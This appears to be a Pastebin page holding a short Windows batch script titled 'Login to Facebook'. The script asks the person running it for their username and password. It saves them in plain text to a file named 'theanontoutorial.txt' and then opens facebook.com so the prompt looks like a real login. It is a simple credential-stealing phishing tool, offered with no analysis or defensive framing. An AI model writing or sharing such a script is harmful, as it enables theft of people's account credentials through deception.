Advertisement
Guest User

Untitled

a guest
Apr 5th, 2018
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. echo off
  2. color 0a
  3. title Login to Facebook
  4. cls
  5. echo Please enter Your Username and Password
  6. echo.
  7. echo.
  8. set /p user=username:
  9. set /p pass=password:
  10. cls
  11. echo username=%user% password=%pass% >theanontoutorial.txt
  12. start www.facebook.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement